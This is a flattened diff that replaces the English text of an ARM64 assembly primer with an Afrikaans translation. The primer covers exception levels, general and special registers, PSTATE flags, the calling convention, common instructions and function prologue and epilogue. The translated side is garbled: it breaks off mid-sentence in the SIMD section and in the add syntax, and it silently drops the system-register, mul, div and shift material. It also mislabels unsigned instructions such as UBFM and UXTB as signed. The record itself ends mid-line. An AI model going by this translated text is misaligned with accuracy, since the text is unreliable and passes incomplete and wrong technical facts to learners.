systems (each in its own EL1) running on the same physical hardware. - * EL2 provides features for isolation and control of the virtualized environments. -4. **EL3 - Secure Monitor Mode**: - * This is the most privileged level and is often used for secure booting and trusted execution environments. - * EL3 can manage and control accesses between secure and non-secure states (such as secure boot, trusted OS, etc.). +1. **EL0 - Gebruikersmodus**: +* Dit is die minste bevoorregte vlak en word gebruik vir die uitvoering van gewone toepassingskode. +* Toepassings wat op EL0 loop, is geïsoleer van mekaar en van die stelsel sagteware, wat die veiligheid en stabiliteit verbeter. +2. **EL1 - Bedryfstelsel-kernelmodus**: +* Die meeste bedryfstelsel-kernels loop op hierdie vlak. +* EL1 het meer voorregte as EL0 en kan toegang tot stelselhulpbronne verkry, maar met sekere beperkings om stelselintegriteit te verseker. +3. **EL2 - Hipervisormodus**: +* Hierdie vlak word gebruik vir virtualisering. 'n Hipervisor wat op EL2 loop, kan verskeie bedryfstelsels (elk in sy eie EL1) bestuur wat op dieselfde fisiese hardeware loop. +* EL2 bied funksies vir isolasie en beheer van die gevirtualiseerde omgewings. +4. **EL3 - Veilige Monitor-modus**: +* Dit is die mees bevoorregte vlak en word dikwels gebruik vir veilige opstart en vertroude uitvoeringsomgewings. +* EL3 kan toegang tussen veilige en nie-veilige toestande bestuur en beheer (soos veilige opstart, vertroude bedryfstelsel, ens.). -The use of these levels allows for a structured and secure way to manage different aspects of the system, from user applications to the most privileged system software. ARMv8's approach to privilege levels helps in effectively isolating different system components, thereby enhancing the security and robustness of the system. +Die gebruik van hierdie vlakke maak dit moontlik om verskillende aspekte van die stelsel op 'n gestruktureerde en veilige manier te bestuur, van gebruikerstoepassings tot die mees bevoorregte stelselsagteware. ARMv8 se benadering tot voorregvlakke help om verskillende stelselkomponente doeltreffend te isoleer, wat die veiligheid en robuustheid van die stelsel verbeter. ## **Registers (ARM64v8)** -ARM64 has **31 general-purpose registers**, labeled `x0` through `x30`. Each can store a **64-bit** (8-byte) value. For operations that require only 32-bit values, the same registers can be accessed in a 32-bit mode using the names w0 through w30. +ARM64 het **31 algemene doelregisters**, gemerk as `x0` tot `x30`. Elkeen kan 'n **64-bis** (8-byte) waarde stoor. Vir bewerkings wat slegs 32-bis waardes vereis, kan dieselfde registers in 'n 32-bis modus benader word deur die name w0 tot w30 te gebruik. -1. **`x0`** to **`x7`** - These are typically used as scratch registers and for passing parameters to subroutines. - * **`x0`** also carries the return data of a function -2. **`x8`** - In the Linux kernel, `x8` is used as the system call number for the `svc` instruction. **In macOS the x16 is the one used!** -3. **`x9`** to **`x15`** - More temporary registers, often used for local variables. -4. **`x16`** and **`x17`** - **Intra-procedural Call Registers**. Temporary registers for immediate values. They are also used for indirect function calls and PLT (Procedure Linkage Table) stubs. - * **`x16`** is used as the **system call number** for the **`svc`** instruction in **macOS**. -5. **`x18`** - **Platform register**. It can be used as a general-purpose register, but on some platforms, this register is reserved for platform-specific uses: Pointer to current thread environment block in Windows, or to point to the currently **executing task structure in linux kernel**. -6. **`x19`** to **`x28`** - These are callee-saved registers. A function must preserve these registers' values for its caller, so they are stored in the stack and recovered before going back to the caller. -7. **`x29`** - **Frame pointer** to keep track of the stack frame. When a new stack frame is created because a function is called, the **`x29`** register is **stored in the stack** and the **new** frame pointer address is (**`sp`** address) is **stored in this registry**. - * This register can also be used as a **general-purpose registry** although it's usually used as reference to **local variables**. -8. **`x30`** or **`lr`**- **Link register** . It holds the **return address** when a `BL` (Branch with Link) or `BLR` (Branch with Link to Register) instruction is executed by storing the **`pc`** value in this register. - * It could also be used like any other register. -9. **`sp`** - **Stack pointer**, used to keep track of the top of the stack. - * the **`sp`** value should always be kept to at least a **quadword** **alignment** or a alignment exception may occur. -10. **`pc`** - **Program counter**, which points to the next instruction. This register can only be updates through exception generations, exception returns, and branches. The only ordinary instructions that can read this register are branch with link instructions (BL, BLR) to store the **`pc`** address in **`lr`** (Link Register). -11. **`xzr`** - **Zero register**. Also called **`wzr`** in it **32**-bit register form. Can be used to get the zero value easily (common operation) or to perform comparisons using **`subs`** like **`subs XZR, Xn, #10`** storing the resulting data nowhere (in **`xzr`**). +1. **`x0`** tot **`x7`** - Hierdie word tipies gebruik as skrapsregisters en vir die deurgee van parameters na subroetines. +* **`x0`** dra ook die terugvoerdata van 'n funksie. +2. **`x8`** - In die Linux-kernel word `x8` gebruik as die stelseloproepnommer vir die `svc`-instruksie. **In macOS is x16 die een wat gebruik word!** +3. **`x9`** tot **`x15`** - Meer tydelike registers, dikwels gebruik vir plaaslike veranderlikes. +4. **`x16`** en **`x17`** - **Intra-prosedurale Oproepregisters**. Tydelike registers vir onmiddellike waardes. Hulle word ook gebruik vir indirekte funksie-oproepe en PLT (Procedure Linkage Table) stubs. +* **`x16`** word gebruik as die **stelseloproepnommer** vir die **`svc`**-instruksie in **macOS**. +5. **`x18`** - **Platformregister**. Dit kan as 'n algemene doelregister gebruik word, maar op sommige platforms is hierdie register gereserveer vir platformspefifieke gebruike: Wysiger na die huidige draadomgewingsblok in Windows, of om te wys na die tans **uitvoerende taakstruktuur in die Linux-kernel**. +6. **`x19`** tot **`x28`** - Hierdie is callee-bewaarregisters. 'n Funksie moet hierdie registers se waardes bewaar vir sy aanroeper, sodat hulle in die stapel gestoor en herstel word voordat teruggekeer word na die aanroeper. +7. **`x29`** - **Raamregister** om die stapelraam dop te hou. Wanneer 'n nuwe stapelraam geskep word omdat 'n funksie geroep word, word die **`x29`**-register **in die stapel gestoor** en die nuwe raamregisteradres is (**`sp`**-adres) is **in hierdie register gestoor**. +* Hierdie register kan ook as 'n **algemene doelregister** gebruik word, alhoewel dit gewoonlik gebruik word as verwysing na **plaaslike veranderlikes**. +8. **`x30`** of **`lr`**- **Skakelregister**. Dit hou die **terugkeeradres** wanneer 'n `BL` (Branch with Link) of `BLR` (Branch with Link to Register) instruksie uitgevoer word deur die **`pc`**-waarde in hierdie register te stoor. +* Dit kan ook soos enige ander register gebruik word. +9. **`sp`** - **Stapelwyser**, gebruik om die boonste gedeelte van die stapel dop te hou. +* Die waarde van **`sp`** moet altyd minstens 'n **quadword-uitlyning** behou of 'n uitlyningsuitsondering kan voorkom. +10. **`pc`** - **Programteller**, wat na die volgende instruksie wys. Hierdie register kan slegs opgedateer word deur uitsonderingsgenerasies, uitsonderingsterugkeer en spronge. Die enigste gewone instruksies wat hierdie register kan lees, is sprong met skakelinstruksies (BL, BLR) om die **`pc`**-adres in **`lr`** (Skakelregister) te stoor. +11. **`xzr`** - **Nulregister**. Ook genoem **`wzr`** in sy **32**-bis registervorm. Dit kan gebruik word om die nulwaarde maklik te verkry (gewone bewerking) of om vergelykings uit te voer met behulp van **`subs`** soos **`subs XZR, Xn, #10`** sonder om die resultaatdata enige plek te stoor (in **`xzr`**). -The **`Wn`** registers are the **32bit** version of the **`Xn`** register. +Die **`Wn`**-registers is die **32-bis**-weergawe van die **`Xn`**-register. -### SIMD and Floating-Point Registers - -Moreover, there are another **32 registers of 128bit length** that can be used in optimized single instruction multiple data (SIMD) operations and for performing floating-point arithmetic. These are called the Vn registers although they can also operate in **64**-bit, **32**-bit, **16**-bit and **8**-bit and then they are called **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** and **`Bn`**. - -### System Registers - -**There are hundreds of system registers**, also called special-purpose registers (SPRs), are used for **monitoring** and **controlling** **processors** behaviour.\ -They can only be read or set using the dedicated special instruction **`mrs`** and **`msr`**. - -The special registers **`TPIDR_EL0`** and **`TPIDDR_EL0`** are commonly found when reversing engineering. The `EL0` suffix indicates the **minimal exception** from which the register can be accessed (in this case EL0 is the regular exception (privilege) level regular programs runs with).\ -They are often used to store the **base address of the thread-local storage** region of memory. Usually the first one is readable and writable for programs running in EL0, but the second can be read from EL0 and written from EL1 (like kernel). - -* `mrs x0, TPIDR_EL0 ; Read TPIDR_EL0 into x0` -* `msr TPIDR_EL0, X0 ; Write x0 into TPIDR_EL0` +### SIMD- en Drijfpuntregisters +Daar is ook nog **32 registers van 128-bis lengte** wat gebruik kan word in geoptimalise ### **PSTATE** -**PSTATE** contains several process components serialized into the operating-system-visible **`SPSR_ELx`** special register, being X the **permission** **level of the triggered** exception (this allows to recover the process state when the exception ends).\ -These are the accessible fields: +**PSTATE** bevat verskeie proseskomponente wat geserializeer is in die bedryfstelsel-sigbare **`SPSR_ELx`** spesiale register, waar X die **toestemmingsvlak van die geaktiveerde** uitsondering is (dit maak dit moontlik om die prosesstaat te herstel wanneer die uitsondering eindig).\ +Hierdie is die toeganklike velde:
-* The **`N`**, **`Z`**, **`C`** and **`V`** condition flags: - * **`N`** means the operation yielded a negative result - * **`Z`** means the operation yielded zero - * **`C`** means the operation carried - * **`V`** means the operation yielded a signed overflow: - * The sum of two positive numbers yields a negative result. - * The sum of two negative numbers yields a positive result. - * In subtraction, when a large negative number is subtracted from a smaller positive number (or vice versa), and the result cannot be represented within the range of the given bit size. +* Die **`N`**, **`Z`**, **`C`** en **`V`** kondisie-vlae: +* **`N`** beteken die bewerking het 'n negatiewe resultaat opgelewer +* **`Z`** beteken die bewerking het nul opgelewer +* **`C`** beteken die bewerking het gedra +* **`V`** beteken die bewerking het 'n getekende oorvloei opgelewer: +* Die som van twee positiewe getalle lewer 'n negatiewe resultaat op. +* Die som van twee negatiewe getalle lewer 'n positiewe resultaat op. +* By aftrekking, wanneer 'n groot negatiewe getal van 'n kleiner positiewe getal afgetrek word (of andersom), en die resultaat nie binne die reeks van die gegewe bitgrootte verteenwoordig kan word nie. {% hint style="warning" %} -Not all the instructions update these flags. Some like **`CMP`** or **`TST`** do, and others that have an s suffix like **`ADDS`** also do it. +Nie al die instruksies werk hierdie vlae by nie. Sommige soos **`CMP`** of **`TST`** doen dit, en ander wat 'n s-suffix het soos **`ADDS`** doen dit ook. {% endhint %} -* The current **register width (`nRW`) flag**: If the flag holds the value 0, the program will run in the AArch64 execution state once resumed. -* The current **Exception Level** (**`EL`**): A regular program running in EL0 will have the value 0 -* The **single stepping** flag (**`SS`**): Used by debuggers to single step by setting the SS flag to 1 inside **`SPSR_ELx`** through an exception. The program will run a step and issue a single step exception. -* The **illegal exception** state flag (**`IL`**): It's used to mark when a privileged software performs an invalid exception level transfer, this flag is set to 1 and the processor triggers an illegal state exception. -* The **`DAIF`** flags: These flags allow a privileged program to selectively mask certain external exceptions. - * If **`A`** is 1 it means **asynchronous aborts** will be triggered. The **`I`** configures to respond to external hardware **Interrupts Requests** (IRQs). and the F is related to **Fast Interrupt Requests** (FIRs). -* The **stack pointer select** flags (**`SPS`**): Privileged programs running in EL1 and above can swap between using their own stack pointer register and the user-model one (e.g. between `SP_EL1` and `EL0`). This switching is performed by writing to the **`SPSel`** special register. This cannot be done from EL0. +* Die huidige **registerbreedte (`nRW`) vlag**: As die vlag die waarde 0 bevat, sal die program in die AArch64-uitvoeringsstaat loop sodra dit hervat word. +* Die huidige **Uitsonderingsvlak** (**`EL`**): 'n Gewone program wat in EL0 loop, sal die waarde 0 hê +* Die **enkelstap-vlag** (**`SS`**): Gebruik deur aflynontleders om enkelstappe te neem deur die SS-vlag na 1 binne **`SPSR_ELx`** te stel deur 'n uitsondering. Die program sal 'n stap neem en 'n enkelstap-uitsondering uitreik. +* Die onwettige-uitsonderingstatus-vlag (**`IL`**): Dit word gebruik om aan te dui wanneer 'n bevoorregte sagteware 'n ongeldige uitsonderingsvlak-oordrag uitvoer, hierdie vlag word na 1 gestel en die verwerker reik 'n onwettige-toestand-uitsondering uit. +* Die **`DAIF`**-vlakke: Hierdie vlae maak dit vir 'n bevoorregte program moontlik om sekere eksterne uitsonderings selektief te maskeer. +* As **`A`** 1 is, beteken dit dat **asynchrone afbreke** geaktiveer sal word. Die **`I`** stel dit in om te reageer op eksterne hardeware **Interrupt-aanvrae** (IRQ's). en die F is verband hou met **Vinnige Onderbrekingsaanvrae** (FIR's). +* Die **stapelwyserkies-vlae** (**`SPS`**): Bevoorregte programme wat in EL1 en hoër loop, kan wissel tussen die gebruik van hul eie stapelwyserregister en die gebruikersmodel een (bv. tussen `SP_EL1` en `EL0`). Hierdie oorskakeling word uitgevoer deur te skryf na die **`SPSel`** spesiale register. Dit kan nie vanaf EL0 gedoen word nie. -## **Calling Convention (ARM64v8)** +## **Oproepkonvensie (ARM64v8)** -The ARM64 calling convention specifies that the **first eight parameters** to a function are passed in registers **`x0` through `x7`**. **Additional** parameters are passed on the **stack**. The **return** value is passed back in register **`x0`**, or in **`x1`** as well **if its 128 bits long**. The **`x19`** to **`x30`** and **`sp`** registers must be **preserved** across function calls. +Die ARM64-oproepkonvensie spesifiseer dat die **eerste agt parameters** na 'n funksie deurgegee word in die registers **`x0` tot `x7`**. **Addisionele** parameters word op die **stapel** deurgegee. Die **terugkeerwaarde** word teruggegee in die register **`x0`**, of in **`x1`** ook **as dit 128 bits lank is**. Die **`x19`** tot **`x30`** en **`sp`** registers moet behou word oor funksie-oproepe. -When reading a function in assembly, look for the **function prologue and epilogue**. The **prologue** usually involves **saving the frame pointer (`x29`)**, **setting** up a **new frame pointer**, and a**llocating stack space**. The **epilogue** usually involves **restoring the saved frame pointer** and **returning** from the function. +Wanneer 'n funksie in samestelling gelees word, soek na die **funksieproloog en epiloog**. Die **proloog** behels gewoonlik die **bewaring van die raampunt (`x29`)**, die **opstel** van 'n **nuwe raampunt**, en die **toekenning van stapelruimte**. Die **epiloog** behels gewoonlik die **herstel van die bewaarde raampunt** en die **terugkeer** uit die funksie. -### Calling Convention in Swift +### Oproepkonvensie in Swift -Swift have its own **calling convention** that can be found in [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64) +Swift het sy eie **oproepkonvensie** wat gevind kan word by [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64) -## **Common Instructions (ARM64v8)** +## **Gewone Instruksies (ARM64v8)** -ARM64 instructions generally have the **format `opcode dst, src1, src2`**, where **`opcode`** is the **operation** to be performed (such as `add`, `sub`, `mov`, etc.), **`dst`** is the **destination** register where the result will be stored, and **`src1`** and **`src2`** are the **source** registers. Immediate values can also be used in place of source registers. +ARM64-instruksies het gewoonlik die **formaat `opcode dst, src1, src2`**, waar **`opcode`** die **bewerking** is wat uitgevoer moet word (soos `add`, `sub`, `mov`, ens.), **`dst`** die **bestemmingsregister** is waarin die resultaat gestoor sal word, en **`src1`** en **`src2`** die **bronregisters** is. Onmiddellike waardes kan ook gebruik word in plaas van bronregisters. -* **`mov`**: **Move** a value from one **register** to another. - * Example: `mov x0, x1` — This moves the value from `x1` to `x0`. -* **`ldr`**: **Load** a value from **memory** into a **register**. - * Example: `ldr x0, [x1]` — This loads a value from the memory location pointed to by `x1` into `x0`. -* **`str`**: **Store** a value from a **register** into **memory**. - * Example: `str x0, [x1]` — This stores the value in `x0` into the memory location pointed to by `x1`. -* **`ldp`**: **Load Pair of Registers**. This instruction **loads two registers** from **consecutive memory** locations. The memory address is typically formed by adding an offset to the value in another register. - * Example: `ldp x0, x1, [x2]` — This loads `x0` and `x1` from the memory locations at `x2` and `x2 + 8`, respectively. -* **`stp`**: **Store Pair of Registers**. This instruction **stores two registers** to **consecutive memory** locations. The memory address is typically formed by adding an offset to the value in another register. - * Example: `stp x0, x1, [x2]` — This stores `x0` and `x1` to the memory locations at `x2` and `x2 + 8`, respectively. -* **`add`**: **Add** the values of two registers and store the result in a register. - * Syntax: add(s) Xn1, Xn2, Xn3 | #imm, \[shift #N | RRX] - * Xn1 -> Destination - * Xn2 -> Operand 1 - * Xn3 | #imm -> Operando 2 (register or immediate) - * \[shift #N | RRX] -> Performa shift or call RRX - * Example: `add x0, x1, x2` — This adds the values in `x1` and `x2` together and stores the result in `x0`. - * `add x5, x5, #1, lsl #12` — This equals to 4096 (a 1 shifter 12 times) -> 1 0000 0000 0000 0000 - * **`adds`** This perform an `add` and updates the flags -* **`sub`**: **Subtract** the values of two registers and store the result in a register. - * Check **`add`** **syntax**. - * Example: `sub x0, x1, x2` — This subtracts the value in `x2` from `x1` and stores the result in `x0`. - * **`subs`** This is like sub but updating the flag -* **`mul`**: **Multiply** the values of **two registers** and store the result in a register. - * Example: `mul x0, x1, x2` — This multiplies the values in `x1` and `x2` and stores the result in `x0`. -* **`div`**: **Divide** the value of one register by another and store the result in a register. - * Example: `div x0, x1, x2` — This divides the value in `x1` by `x2` and stores the result in `x0`. -* **`lsl`**, **`lsr`**, **`asr`**, **`ror`, `rrx`**: - * **Logical shift left**: Add 0s from the end moving the other bits forward (multiply by n-times 2) - * **Logical shift right**: Add 1s at the beginning moving the other bits backward (divide by n-times 2 in unsigned) - * **Arithmetic shift right**: Like **`lsr`**, but instead of adding 0s if the most significant bit is a 1, **1s are added (**divide by ntimes 2 in signed) - * **Rotate right**: Like **`lsr`** but whatever is removed from the right it's appended to the left - * **Rotate Right with Extend**: Like **`ror`**, but with the carry flag as the "most significant bit". So the carry flag is moved to the bit 31 and the removed bit to the carry flag. -* **`bfm`**: **Bit Filed Move**, these operations **copy bits `0...n`** from a value an place them in positions **`m..m+n`**. The **`#s`** specifies the **leftmost bit** position and **`#r`** the **rotate right amount**. - * Bitfiled move: `BFM Xd, Xn, #r` - * Signed Bitfield move: `SBFM Xd, Xn, #r, #s` - * Unsigned Bitfield move: `UBFM Xd, Xn, #r, #s` -* **Bitfield Extract and Insert:** Copy a bitfield from a register and copies it to another register. - * **`BFI X1, X2, #3, #4`** Insert 4 bits from X2 from the 3rd bit of X1 - * **`BFXIL X1, X2, #3, #4`** Extract from the 3rd bit of X2 four bits and copy them to X1 - * **`SBFIZ X1, X2, #3, #4`** Sign-extends 4 bits from X2 and inserts them into X1 starting at bit position 3 zeroing the right bits - * **`SBFX X1, X2, #3, #4`** Extracts 4 bits starting at bit 3 from X2, sign extends them, and places the result in X1 - * **`UBFIZ X1, X2, #3, #4`** Zero-extends 4 bits from X2 and inserts them into X1 starting at bit position 3 zeroing the right bits - * **`UBFX X1, X2, #3, #4`** Extracts 4 bits starting at bit 3 from X2 and places the zero-extended result in X1. -* **Sign Extend To X:** Extends the sign (or adds just 0s in the unsigned version) of a value to be able to perform operations with it: - * **`SXTB X1, W2`** Extends the sign of a byte **from W2 to X1** (`W2` is half of `X2`) to fill the 64bits - * **`SXTH X1, W2`** Extends the sign of a 16bit number **from W2 to X1** to fill the 64bits - * **`SXTW X1, W2`** Extends the sign of a byte **from W2 to X1** to fill the 64bits - * **`UXTB X1, W2`** Adds 0s (unsigned) to a byte **from W2 to X1** to fill the 64bits -* **`extr`:** Extracts bits from a specified **pair of registers concatenated**. - * Example: `EXTR W3, W2, W1, #3` This will **concat W1+W2** and get **from bit 3 of W2 up to bit 3 of W1** and store it in W3. -* **`bl`**: **Branch** with link, used to **call** a **subroutine**. Stores the **return address in `x30`**. - * Example: `bl myFunction` — This calls the function `myFunction` and stores the return address in `x30`. -* **`blr`**: **Branch** with Link to Register, used to **call** a **subroutine** where the target is **specified** in a **register**. Stores the return address in `x30`. - * Example: `blr x1` — This calls the function whose address is contained in `x1` and stores the return address in `x30`. -* **`ret`**: **Return** from **subroutine**, typically using the address in **`x30`**. - * Example: `ret` — This returns from the current subroutine using the return address in `x30`. -* **`cmp`**: **Compare** two registers and set condition flags. It's an **alias of `subs`** setting the destination register to the zero register. Useful to know if `m == n`. - * It supports the **same syntax as `subs`** - * Example: `cmp x0, x1` — This compares the values in `x0` and `x1` and sets the condition flags accordingly. -* **`cmn`**: **Compare negative** operand. In this case it's an **alias of `adds`** and supports the same syntax. Useful to know if `m == -n`. -* **tst**: It checks if any of the values of a reg is 1 (it works like and ANDS without storing the result anywhere) - * Example: `tst X1, #7` Check if any of the last 3 bits of X1 is 1 -* **`b.eq`**: **Branch if equal**, based on the previous `cmp` instruction. - * Example: `b.eq label` — If the previous `cmp` instruction found two equal values, this jumps to `label`. -* **`b.ne`**: **Branch if Not Equal**. This instruction checks the condition flags (which were set by a previous comparison instruction), and if the compared values were not equal, it branches to a label or address. - * Example: After a `cmp x0, x1` instruction, `b.ne label` — If the values in `x0` and `x1` were not equal, this jumps to `label`. -* **`cbz`**: **Compare and Branch on Zero**. This instruction compares a register with zero, and if they are equal, it branches to a label or address. - * Example: `cbz x0, label` — If the value in `x0` is zero, this jumps to `label`. -* **`cbnz`**: **Compare and Branch on Non-Zero**. This instruction compares a register with zero, and if they are not equal, it branches to a label or address. - * Example: `cbnz x0, label` — If the value in `x0` is non-zero, this jumps to `label`. -* **`adrp`**: Compute the **page address of a symbol** and store it in a register. - * Example: `adrp x0, symbol` — This computes the page address of `symbol` and stores it in `x0`. -* **`ldrsw`**: **Load** a signed **32-bit** value from memory and **sign-extend it to 64** bits. - * Example: `ldrsw x0, [x1]` — This loads a signed 32-bit value from the memory location pointed to by `x1`, sign-extends it to 64 bits, and stores it in `x0`. -* **`stur`**: **Store a register value to a memory location**, using an offset from another register. - * Example: `stur x0, [x1, #4]` — This stores the value in `x0` into the memory ddress that is 4 bytes greater than the address currently in `x1`. -* **`svc`** : Make a **system call**. It stands for "Supervisor Call". When the processor executes this instruction, it **switches from user mode to kernel mode** and jumps to a specific location in memory where the **kernel's system call handling** code is located. - * Example: +* **`mov`**: **Beweeg** 'n waarde van die een **register** na die ander. +* Voorbeeld: `mov x0, x1` — Dit beweeg die waarde van `x1` na `x0`. +* **`ldr`**: **Laai** 'n waarde van **geheue** in 'n **register**. +* Voorbeeld: `ldr x0, [x1]` — Dit laai 'n waarde van die geheueposisie wat deur `x1` aangedui word in `x0`. +* **`str`**: **Stoor** 'n waarde van 'n **register** in die **geheue**. +* Voorbeeld: `str x0, [x1]` — Dit stoor die waarde in `x0` in die geheueposisie wat deur `x1` aangedui word. +* **`ldp`**: **Laai Paar van Register**. Hierdie instruksie **laai twee registers** vanaf **opeenvolgende geheueposisies**. Die geheue-adres word tipies gevorm deur 'n verskuiwing by te voeg by die waarde in 'n ander register. +* Voorbeeld: `ldp x0, x1, [x2]` — Dit laai `x0` en `x1` vanaf die geheueposisies by `x2` en `x2 + 8`, onderskeidelik. +* **`stp`**: **Stoor Paar van Register**. Hierdie instruksie **stoor twee registers** na **opeenvolgende geheueposisies**. Die geheue-adres word tipies gevorm deur 'n verskuiwing by te voeg by die waarde in 'n ander register. +* Voorbeeld: `stp x0, x1, [x2]` — Dit stoor `x0` en `x1` na die geheueposisies by `x2` en `x2 + 8`, onderskeidelik. +* **`add`**: **Tel** die waardes van twee registers bymekaar en stoor die resultaat in 'n register. +* Syntaks: add(s) Xn1, Xn2, +* **`bfm`**: **Bit Filed Move**, hierdie operasies **kopieer bits `0...n`** van 'n waarde en plaas hulle in posisies **`m..m+n`**. Die **`#s`** spesifiseer die **linkerste bit** posisie en **`#r`** die **aantal regsomdraaie**. +* Bitveldbeweging: `BFM Xd, Xn, #r` +* Ondertekende Bitveldbeweging: `SBFM Xd, Xn, #r, #s` +* Ondertekende Bitveldbeweging: `UBFM Xd, Xn, #r, #s` +* **Bitveld Uittrek en Invoeg:** Kopieer 'n bitveld vanaf 'n register en kopieer dit na 'n ander register. +* **`BFI X1, X2, #3, #4`** Voeg 4 bits vanaf X2 in vanaf die 3de bit van X1 +* **`BFXIL X1, X2, #3, #4`** Trek vanaf die 3de bit van X2 vier bits uit en kopieer dit na X1 +* **`SBFIZ X1, X2, #3, #4`** Brei 4 bits vanaf X2 uit en voeg dit in X1 in beginnende by bit posisie 3 en maak die regterbits nul +* **`SBFX X1, X2, #3, #4`** Trek 4 bits uit beginnende by bit 3 vanaf X2, brei dit uit en plaas die resultaat in X1 +* **`UBFIZ X1, X2, #3, #4`** Brei 4 bits vanaf X2 uit en voeg dit in X1 in beginnende by bit posisie 3 en maak die regterbits nul +* **`UBFX X1, X2, #3, #4`** Trek 4 bits uit beginnende by bit 3 vanaf X2 en plaas die nul-uitgebreide resultaat in X1. +* **Brei Teken Uit Na X:** Brei die teken (of voeg net 0's by in die ondertekende weergawe) van 'n waarde uit om operasies daarmee uit te voer: +* **`SXTB X1, W2`** Brei die teken van 'n byte **vanaf W2 na X1** (`W2` is die helfte van `X2`) om die 64-bits te vul +* **`SXTH X1, W2`** Brei die teken van 'n 16-bits getal **vanaf W2 na X1** om die 64-bits te vul +* **`SXTW X1, W2`** Brei die teken van 'n byte **vanaf W2 na X1** om die 64-bits te vul +* **`UXTB X1, W2`** Voeg 0's by (ondertekend) by 'n byte **vanaf W2 na X1** om die 64-bits te vul +* **`extr`:** Trek bits uit van 'n gespesifiseerde **paar registers wat gekonkatenasieer is**. +* Voorbeeld: `EXTR W3, W2, W1, #3` Dit sal **W1+W2** konkatenasieer en vanaf bit 3 van W2 tot en met bit 3 van W1 kry en dit in W3 stoor. +* **`bl`**: **Branch** met skakel, gebruik om 'n **subroetine** te **roep**. Stoor die **terugkeeradres in `x30`**. +* Voorbeeld: `bl myFunction` — Dit roep die funksie `myFunction` en stoor die terugkeeradres in `x30`. +* **`blr`**: **Branch** met skakel na register, gebruik om 'n **subroetine** te **roep** waar die teiken in 'n **register** gespesifiseer word. Stoor die terugkeeradres in `x30`. +* Voorbeeld: `blr x1` — Dit roep die funksie waarvan die adres in `x1` bevat word en stoor die terugkeeradres in `x30`. +* **`ret`**: **Terugkeer** vanaf 'n **subroetine**, tipies deur die adres in **`x30`** te gebruik. +* Voorbeeld: `ret` — Dit keer terug vanaf die huidige subroetine deur die terugkeeradres in `x30` te gebruik. +* **`cmp`**: **Vergelyk** twee registers en stel toestandvlagte in. Dit is 'n **alias van `subs`** wat die bestemmingsregister na die nulregister stel. Nuttig om te weet of `m == n`. +* Dit ondersteun dieselfde sintaksis as `subs` +* Voorbeeld: `cmp x0, x1` — Dit vergelyk die waardes in `x0` en `x1` en stel die toestandvlagte dienooreenkomstig in. +* **`cmn`**: **Vergelyk negatiewe** operand. In hierdie geval is dit 'n **alias van `adds`** en ondersteun dieselfde sintaksis. Nuttig om te weet of `m == -n`. +* **tst**: Dit kontroleer of enige van die waardes van 'n register 1 is (werk soos 'n ANDS sonder om die resultaat enige plek te stoor) +* Voorbeeld: `tst X1, #7` Kontroleer of enige van die laaste 3 bits van X1 1 is +* **`b.eq`**: **Spring as gelyk**, gebaseer op die vorige `cmp` instruksie. +* Voorbeeld: `b.eq label` — As die vorige `cmp` instruksie twee gelyke waardes gevind het, spring dit na `label`. +* **`b.ne`**: **Spring as Nie Gelyk**. Hierdie instruksie kontroleer die toestandvlagte (wat deur 'n vorige vergelykingsinstruksie gestel is) en as die vergelykte waardes nie gelyk was nie, spring dit na 'n etiket of adres. +* Voorbeeld: Na 'n `cmp x0, x1` instruksie, `b.ne label` — As die waardes in `x0` en `x1` nie gelyk was nie, spring dit na `label`. +* **`cbz`**: **Vergelyk en Spring op Nul**. Hierdie instruksie vergelyk 'n register met nul en as hulle gelyk is, spring dit na 'n etiket of adres. +* Voorbeeld: `cbz x0, label` — As die waarde in `x0` nul is, spring dit na `label`. +* **`cbnz`**: **Vergelyk en Spring op Nie-Nul**. Hierdie instruksie vergelyk 'n register met nul en as hulle nie gelyk is nie, spring dit na 'n etiket of adres. +* Voorbeeld: `cbnz x0, label` — As die waarde in `x0` nie-nul is nie, spring dit na `label`. +* **`adrp`**: Bereken die **bladsy-adres van 'n simbool** en stoor dit in 'n register. +* Voorbeeld: `adrp x0, symbol` — Dit bereken die bladsy-adres van `symbol` en stoor dit in `x0`. +* **`ldrsw`**: **Laai** 'n ondertekende **32-bits** waarde vanaf geheue en **brei dit uit tot 64** bits. +* Voorbeeld: `ldrsw x0, [x1]` — Dit laai 'n ondertekende 32-bits waarde vanaf die geheueposisie wat deur `x1` aangedui word, brei dit uit tot 64 bits en stoor dit in `x0`. +* **`stur`**: **Stoor 'n registerwaarde na 'n geheueposisie**, met 'n verskuiwing vanaf 'n ander register. +* Voorbeeld: `stur x0, [x1, #4]` — Dit stoor die waarde in `x0` in die geheue-adres wat 4 byte groter is as die adres wat tans in `x1` is. +* **`svc`** : Maak 'n **stelseloproep**. Dit staan vir "Supervisor Call". Wanneer die verwerker hierdie instruksie uitvoer, skakel dit oor van gebruikersmodus na kernmodus en spring na 'n spesifieke plek in die geheue waar die **kern se stelseloproephantering** kode geleë is. +* Voorbeeld: - ```armasm - mov x8, 93 ; Load the system call number for exit (93) into register x8. - mov x0, 0 ; Load the exit status code (0) into register x0. - svc 0 ; Make the system call. - ``` +```armasm +mov x8, 93 ; Laai die stelseloproepnommer vir afsluiting (93) in register x8. +mov x0, 0 ; Laai die afsluitstatuskode (0) in register x0. +svc 0 ; Maak die stelseloproep. +``` +### **Funksie Proloog** -### **Function Prologue** +1. **Berg die skakelregister en raamverwysing op die stoorplek op**: -1. **Save the link register and frame pointer to the stack**: +{% code overflow="wrap" %} +```armasm +stp x29, x30, [sp, #-16]! ; stoor die paar x29 en x30 op die stoorplek en verminder die stooraanwyser +``` +{% endcode %} +2. **Stel die nuwe raamverwysing op**: `mov x29, sp` (stel die nuwe raamverwysing op vir die huidige funksie) +3. **Ken ruimte op die stoorplek toe vir plaaslike veranderlikes** (indien nodig): `sub sp, sp, ` (waar `` die aantal bytes is wat benodig word) - {% code overflow="wrap" %} - ```armasm - stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer - ``` - {% endcode %} -2. **Set up the new frame pointer**: `mov x29, sp` (sets up the new frame pointer for the current function) -3. **Allocate space on the stack for local variables** (if needed): `sub sp, sp, ` (where `` is the number of bytes needed) +### **Funksie Epiloog** -### **Function Epilogue** - -1. **Deallocate local variables (if any were allocated)**: `add sp, sp, ` -2. **Restore the link register and frame pointer**: +1. **Deallokeer plaaslike veranderlikes (indien enige toegewys was)**: `add sp, sp, ` +2. **Herstel die 